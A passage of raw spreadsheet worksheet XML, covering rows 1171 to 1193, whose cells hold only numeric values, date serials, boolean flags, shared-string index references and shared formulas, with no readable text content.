        <v>22</v>
      </c>
      <c r="F1171" s="1" t="s">
        <v>250</v>
      </c>
      <c r="G1171" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1171" s="1" t="s">
        <v>5066</v>
      </c>
      <c r="I1171" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J1171" s="1" t="s">
        <v>5050</v>
      </c>
      <c r="K1171" s="2" t="s">
        <v>5051</v>
      </c>
      <c r="L1171" s="1">
        <v>5.0</v>
      </c>
      <c r="M1171" s="1">
        <v>10.0</v>
      </c>
      <c r="N1171" s="1" t="s">
        <v>1702</v>
      </c>
      <c r="O1171" s="1" t="s">
        <v>5052</v>
      </c>
      <c r="P1171" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1171" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1171" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1171" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1172">
      <c r="A1172" s="1">
        <v>16299.0</v>
      </c>
      <c r="B1172" s="2" t="s">
        <v>5067</v>
      </c>
      <c r="C1172" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1172" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1172" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1172" s="1" t="s">
        <v>5068</v>
      </c>
      <c r="G1172" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1172" s="1" t="s">
        <v>5069</v>
      </c>
      <c r="I1172" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J1172" s="1" t="s">
        <v>5050</v>
      </c>
      <c r="K1172" s="2" t="s">
        <v>5051</v>
      </c>
      <c r="L1172" s="1">
        <v>5.0</v>
      </c>
      <c r="M1172" s="1">
        <v>10.0</v>
      </c>
      <c r="N1172" s="1" t="s">
        <v>2371</v>
      </c>
      <c r="O1172" s="1" t="s">
        <v>5052</v>
      </c>
      <c r="P1172" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1172" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1172" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1172" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1173">
      <c r="A1173" s="1">
        <v>16300.0</v>
      </c>
      <c r="B1173" s="2" t="s">
        <v>5070</v>
      </c>
      <c r="C1173" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1173" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1173" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1173" s="1" t="s">
        <v>250</v>
      </c>
      <c r="G1173" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1173" s="1" t="s">
        <v>5071</v>
      </c>
      <c r="I1173" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J1173" s="1" t="s">
        <v>5050</v>
      </c>
      <c r="K1173" s="2" t="s">
        <v>5051</v>
      </c>
      <c r="L1173" s="1">
        <v>5.0</v>
      </c>
      <c r="M1173" s="1">
        <v>10.0</v>
      </c>
      <c r="N1173" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O1173" s="1" t="s">
        <v>5052</v>
      </c>
      <c r="P1173" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1173" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1173" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1173" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1174">
      <c r="A1174" s="1">
        <v>16310.0</v>
      </c>
      <c r="B1174" s="2" t="s">
        <v>5072</v>
      </c>
      <c r="C1174" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1174" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1174" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1174" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G1174" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1174" s="1" t="s">
        <v>5073</v>
      </c>
      <c r="I1174" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J1174" s="1" t="s">
        <v>5074</v>
      </c>
      <c r="K1174" s="2" t="s">
        <v>5075</v>
      </c>
      <c r="L1174" s="1">
        <v>8.0</v>
      </c>
      <c r="M1174" s="1">
        <v>8.0</v>
      </c>
      <c r="N1174" s="1" t="s">
        <v>5076</v>
      </c>
      <c r="O1174" s="1" t="s">
        <v>5077</v>
      </c>
      <c r="P1174" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1174" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1174" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1174" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1175">
      <c r="A1175" s="1">
        <v>16311.0</v>
      </c>
      <c r="B1175" s="2" t="s">
        <v>5078</v>
      </c>
      <c r="C1175" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1175" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1175" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1175" s="1" t="s">
        <v>5079</v>
      </c>
      <c r="G1175" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1175" s="1" t="s">
        <v>5080</v>
      </c>
      <c r="I1175" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1175" s="1" t="s">
        <v>5081</v>
      </c>
      <c r="K1175" s="2" t="s">
        <v>5082</v>
      </c>
      <c r="L1175" s="1">
        <v>1.0</v>
      </c>
      <c r="M1175" s="1">
        <v>1.0</v>
      </c>
      <c r="N1175" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1175" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1175" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1175" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1175" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1175" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1176">
      <c r="A1176" s="1">
        <v>16316.0</v>
      </c>
      <c r="B1176" s="2" t="s">
        <v>5083</v>
      </c>
      <c r="C1176" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1176" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1176" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1176" s="1" t="s">
        <v>5084</v>
      </c>
      <c r="G1176" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1176" s="4">
        <v>44718.74444444444</v>
      </c>
      <c r="I1176" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J1176" s="1" t="s">
        <v>5085</v>
      </c>
      <c r="K1176" s="2" t="s">
        <v>5086</v>
      </c>
      <c r="L1176" s="1">
        <v>2.0</v>
      </c>
      <c r="M1176" s="1">
        <v>2.0</v>
      </c>
      <c r="N1176" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1176" s="1" t="s">
        <v>78</v>
      </c>
      <c r="P1176" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1176" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1176" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1176" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1177">
      <c r="A1177" s="1">
        <v>16320.0</v>
      </c>
      <c r="B1177" s="2" t="s">
        <v>3344</v>
      </c>
      <c r="C1177" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1177" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1177" s="2" t="s">
        <v>2251</v>
      </c>
      <c r="F1177" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G1177" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1177" s="5">
        <v>44480.68541666667</v>
      </c>
      <c r="I1177" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1177" s="1" t="s">
        <v>5087</v>
      </c>
      <c r="K1177" s="2" t="s">
        <v>5088</v>
      </c>
      <c r="L1177" s="1">
        <v>6.0</v>
      </c>
      <c r="M1177" s="1">
        <v>17.0</v>
      </c>
      <c r="N1177" s="1" t="s">
        <v>4476</v>
      </c>
      <c r="O1177" s="1" t="s">
        <v>5089</v>
      </c>
      <c r="P1177" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1177" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1177" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1177" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1178">
      <c r="A1178" s="1">
        <v>16327.0</v>
      </c>
      <c r="B1178" s="2" t="s">
        <v>5090</v>
      </c>
      <c r="C1178" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1178" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1178" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1178" s="1" t="s">
        <v>703</v>
      </c>
      <c r="G1178" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1178" s="5">
        <v>44511.23819444444</v>
      </c>
      <c r="I1178" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1178" s="1" t="s">
        <v>5087</v>
      </c>
      <c r="K1178" s="2" t="s">
        <v>5088</v>
      </c>
      <c r="L1178" s="1">
        <v>6.0</v>
      </c>
      <c r="M1178" s="1">
        <v>17.0</v>
      </c>
      <c r="N1178" s="1" t="s">
        <v>1192</v>
      </c>
      <c r="O1178" s="1" t="s">
        <v>5089</v>
      </c>
      <c r="P1178" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1178" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1178" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1178" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1179">
      <c r="A1179" s="1">
        <v>16350.0</v>
      </c>
      <c r="B1179" s="2" t="s">
        <v>5091</v>
      </c>
      <c r="C1179" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1179" s="2" t="s">
        <v>4804</v>
      </c>
      <c r="E1179" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1179" s="1" t="s">
        <v>5092</v>
      </c>
      <c r="G1179" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1179" s="1" t="s">
        <v>5093</v>
      </c>
      <c r="I1179" s="1" t="s">
        <v>4234</v>
      </c>
      <c r="J1179" s="1" t="s">
        <v>5094</v>
      </c>
      <c r="K1179" s="2" t="s">
        <v>5095</v>
      </c>
      <c r="L1179" s="1">
        <v>1.0</v>
      </c>
      <c r="M1179" s="1">
        <v>1.0</v>
      </c>
      <c r="N1179" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1179" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1179" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1179" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1179" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1179" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1180">
      <c r="A1180" s="1">
        <v>16372.0</v>
      </c>
      <c r="B1180" s="2" t="s">
        <v>5096</v>
      </c>
      <c r="C1180" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1180" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1180" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1180" s="1" t="s">
        <v>1205</v>
      </c>
      <c r="G1180" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1180" s="4">
        <v>44841.19305555556</v>
      </c>
      <c r="I1180" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1180" s="1" t="s">
        <v>5097</v>
      </c>
      <c r="K1180" s="2" t="s">
        <v>5098</v>
      </c>
      <c r="L1180" s="1">
        <v>2.0</v>
      </c>
      <c r="M1180" s="1">
        <v>3.0</v>
      </c>
      <c r="N1180" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1180" s="1" t="s">
        <v>5099</v>
      </c>
      <c r="P1180" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1180" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1180" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1180" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="1181">
      <c r="A1181" s="1">
        <v>16373.0</v>
      </c>
      <c r="B1181" s="2" t="s">
        <v>5100</v>
      </c>
      <c r="C1181" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1181" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1181" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1181" s="1" t="s">
        <v>5101</v>
      </c>
      <c r="G1181" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1181" s="4">
        <v>44841.56319444445</v>
      </c>
      <c r="I1181" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1181" s="1" t="s">
        <v>5097</v>
      </c>
      <c r="K1181" s="2" t="s">
        <v>5098</v>
      </c>
      <c r="L1181" s="1">
        <v>2.0</v>
      </c>
      <c r="M1181" s="1">
        <v>3.0</v>
      </c>
      <c r="N1181" s="1" t="s">
        <v>5102</v>
      </c>
      <c r="O1181" s="1" t="s">
        <v>5099</v>
      </c>
      <c r="P1181" s="1" t="s">
        <v>2022</v>
      </c>
      <c r="Q1181" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1181" s="2">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="S1181" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="1182">
      <c r="A1182" s="1">
        <v>16374.0</v>
      </c>
      <c r="B1182" s="2" t="s">
        <v>5103</v>
      </c>
      <c r="C1182" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1182" s="2" t="s">
        <v>5104</v>
      </c>
      <c r="E1182" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1182" s="1" t="s">
        <v>1205</v>
      </c>
      <c r="G1182" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1182" s="1" t="s">
        <v>5105</v>
      </c>
      <c r="I1182" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1182" s="1" t="s">
        <v>5097</v>
      </c>
      <c r="K1182" s="2" t="s">
        <v>5098</v>
      </c>
      <c r="L1182" s="1">
        <v>2.0</v>
      </c>
      <c r="M1182" s="1">
        <v>3.0</v>
      </c>
      <c r="N1182" s="1" t="s">
        <v>5106</v>
      </c>
      <c r="O1182" s="1" t="s">
        <v>5099</v>
      </c>
      <c r="P1182" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1182" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1182" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1182" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="1183">
      <c r="A1183" s="1">
        <v>16383.0</v>
      </c>
      <c r="B1183" s="2" t="s">
        <v>5107</v>
      </c>
      <c r="C1183" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1183" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1183" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1183" s="1" t="s">
        <v>258</v>
      </c>
      <c r="G1183" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1183" s="1" t="s">
        <v>5108</v>
      </c>
      <c r="I1183" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J1183" s="1" t="s">
        <v>5109</v>
      </c>
      <c r="K1183" s="2" t="s">
        <v>5110</v>
      </c>
      <c r="L1183" s="1">
        <v>5.0</v>
      </c>
      <c r="M1183" s="1">
        <v>5.0</v>
      </c>
      <c r="N1183" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1183" s="1" t="s">
        <v>3606</v>
      </c>
      <c r="P1183" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1183" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1183" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1183" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1184">
      <c r="A1184" s="1">
        <v>16394.0</v>
      </c>
      <c r="B1184" s="2" t="s">
        <v>5111</v>
      </c>
      <c r="C1184" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1184" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1184" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1184" s="1" t="s">
        <v>5112</v>
      </c>
      <c r="G1184" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1184" s="1" t="s">
        <v>5113</v>
      </c>
      <c r="I1184" s="1" t="s">
        <v>116</v>
      </c>
      <c r="J1184" s="1" t="s">
        <v>5114</v>
      </c>
      <c r="K1184" s="2" t="s">
        <v>5115</v>
      </c>
      <c r="L1184" s="1">
        <v>2.0</v>
      </c>
      <c r="M1184" s="1">
        <v>2.0</v>
      </c>
      <c r="N1184" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1184" s="1" t="s">
        <v>5116</v>
      </c>
      <c r="P1184" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1184" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1184" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1184" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1185">
      <c r="A1185" s="1">
        <v>16456.0</v>
      </c>
      <c r="B1185" s="2" t="s">
        <v>5117</v>
      </c>
      <c r="C1185" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1185" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1185" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1185" s="1" t="s">
        <v>5118</v>
      </c>
      <c r="G1185" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1185" s="1" t="s">
        <v>5119</v>
      </c>
      <c r="I1185" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1185" s="1" t="s">
        <v>5120</v>
      </c>
      <c r="K1185" s="2" t="s">
        <v>5121</v>
      </c>
      <c r="L1185" s="1">
        <v>8.0</v>
      </c>
      <c r="M1185" s="1">
        <v>13.0</v>
      </c>
      <c r="N1185" s="1" t="s">
        <v>5122</v>
      </c>
      <c r="O1185" s="1" t="s">
        <v>5123</v>
      </c>
      <c r="P1185" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1185" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1185" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1185" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1186">
      <c r="A1186" s="1">
        <v>16461.0</v>
      </c>
      <c r="B1186" s="2" t="s">
        <v>5124</v>
      </c>
      <c r="C1186" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1186" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1186" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1186" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G1186" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1186" s="1" t="s">
        <v>5125</v>
      </c>
      <c r="I1186" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1186" s="1" t="s">
        <v>5126</v>
      </c>
      <c r="K1186" s="2" t="s">
        <v>5127</v>
      </c>
      <c r="L1186" s="1">
        <v>2.0</v>
      </c>
      <c r="M1186" s="1">
        <v>4.0</v>
      </c>
      <c r="N1186" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1186" s="1" t="s">
        <v>5128</v>
      </c>
      <c r="P1186" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1186" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1186" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S1186" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="1187">
      <c r="A1187" s="1">
        <v>16462.0</v>
      </c>
      <c r="B1187" s="2" t="s">
        <v>5129</v>
      </c>
      <c r="C1187" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1187" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1187" s="2" t="s">
        <v>2251</v>
      </c>
      <c r="F1187" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G1187" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1187" s="1" t="s">
        <v>5130</v>
      </c>
      <c r="I1187" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1187" s="1" t="s">
        <v>5126</v>
      </c>
      <c r="K1187" s="2" t="s">
        <v>5127</v>
      </c>
      <c r="L1187" s="1">
        <v>2.0</v>
      </c>
      <c r="M1187" s="1">
        <v>4.0</v>
      </c>
      <c r="N1187" s="1" t="s">
        <v>5131</v>
      </c>
      <c r="O1187" s="1" t="s">
        <v>5128</v>
      </c>
      <c r="P1187" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q1187" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1187" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S1187" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="1188">
      <c r="A1188" s="1">
        <v>16463.0</v>
      </c>
      <c r="B1188" s="2" t="s">
        <v>5132</v>
      </c>
      <c r="C1188" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1188" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1188" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1188" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G1188" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1188" s="1" t="s">
        <v>5133</v>
      </c>
      <c r="I1188" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1188" s="1" t="s">
        <v>5126</v>
      </c>
      <c r="K1188" s="2" t="s">
        <v>5127</v>
      </c>
      <c r="L1188" s="1">
        <v>2.0</v>
      </c>
      <c r="M1188" s="1">
        <v>4.0</v>
      </c>
      <c r="N1188" s="1" t="s">
        <v>5134</v>
      </c>
      <c r="O1188" s="1" t="s">
        <v>5128</v>
      </c>
      <c r="P1188" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1188" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1188" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1188" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="1189">
      <c r="A1189" s="1">
        <v>16464.0</v>
      </c>
      <c r="B1189" s="2" t="s">
        <v>5135</v>
      </c>
      <c r="C1189" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1189" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1189" s="2" t="s">
        <v>2251</v>
      </c>
      <c r="F1189" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G1189" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1189" s="1" t="s">
        <v>5136</v>
      </c>
      <c r="I1189" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1189" s="1" t="s">
        <v>5126</v>
      </c>
      <c r="K1189" s="2" t="s">
        <v>5127</v>
      </c>
      <c r="L1189" s="1">
        <v>2.0</v>
      </c>
      <c r="M1189" s="1">
        <v>4.0</v>
      </c>
      <c r="N1189" s="1" t="s">
        <v>5137</v>
      </c>
      <c r="O1189" s="1" t="s">
        <v>5128</v>
      </c>
      <c r="P1189" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1189" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1189" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S1189" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="1190">
      <c r="A1190" s="1">
        <v>16465.0</v>
      </c>
      <c r="B1190" s="2" t="s">
        <v>5138</v>
      </c>
      <c r="C1190" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1190" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1190" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1190" s="1" t="s">
        <v>258</v>
      </c>
      <c r="G1190" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1190" s="1" t="s">
        <v>5139</v>
      </c>
      <c r="I1190" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J1190" s="1" t="s">
        <v>5140</v>
      </c>
      <c r="K1190" s="2" t="s">
        <v>5141</v>
      </c>
      <c r="L1190" s="1">
        <v>5.0</v>
      </c>
      <c r="M1190" s="1">
        <v>7.0</v>
      </c>
      <c r="N1190" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1190" s="1" t="s">
        <v>5142</v>
      </c>
      <c r="P1190" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1190" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1190" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1190" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1191">
      <c r="A1191" s="1">
        <v>16466.0</v>
      </c>
      <c r="B1191" s="2" t="s">
        <v>5143</v>
      </c>
      <c r="C1191" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1191" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1191" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1191" s="1" t="s">
        <v>5144</v>
      </c>
      <c r="G1191" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1191" s="1" t="s">
        <v>5145</v>
      </c>
      <c r="I1191" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J1191" s="1" t="s">
        <v>5140</v>
      </c>
      <c r="K1191" s="2" t="s">
        <v>5141</v>
      </c>
      <c r="L1191" s="1">
        <v>5.0</v>
      </c>
      <c r="M1191" s="1">
        <v>7.0</v>
      </c>
      <c r="N1191" s="1" t="s">
        <v>1430</v>
      </c>
      <c r="O1191" s="1" t="s">
        <v>5142</v>
      </c>
      <c r="P1191" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1191" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1191" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1191" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1192">
      <c r="A1192" s="1">
        <v>16467.0</v>
      </c>
      <c r="B1192" s="2" t="s">
        <v>5146</v>
      </c>
      <c r="C1192" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1192" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1192" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1192" s="1" t="s">
        <v>5147</v>
      </c>
      <c r="G1192" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1192" s="1" t="s">
        <v>5148</v>
      </c>
      <c r="I1192" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J1192" s="1" t="s">
        <v>5140</v>
      </c>
      <c r="K1192" s="2" t="s">
        <v>5141</v>
      </c>
      <c r="L1192" s="1">
        <v>5.0</v>
      </c>
      <c r="M1192" s="1">
        <v>7.0</v>
      </c>
      <c r="N1192" s="1" t="s">
        <v>632</v>
      </c>
      <c r="O1192" s="1" t="s">
        <v>5142</v>
      </c>
      <c r="P1192" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1192" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1192" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1192" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1193">
      <c r="A1193" s="1">
        <v>16468.0</v>
      </c>
      <c r="B1193" s="2" t="s">
        <v>5149</v>
      </c>
      <c r="C1193" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1193" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1193" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1193" s="1" t="s">
        <v>566</v>
      </c>
      <c r="G1193" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1193" s="1" t="s">
        <v>5150</v>
      </c>
      <c r="I1193" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J1193" s="1" t="s">
        <v>5140</v>
      </c>
      <c r="K1193" s="2" t="s">
        <v>5141</v>
      </c>
      <c r="L1193" s="1">
        <v>5.0</v>
      </c>
      <c r="M1193" s="1">
        <v>7.0</v>
      </c>
      <c r="N1193" s="1" t="s">
        <v>2227</v>
      </c>
      <c r="O1193" s="1" t="s">
        <v>5142</v>
      </c>
      <c r="P1193" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q1193" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1193" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1193" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1194">
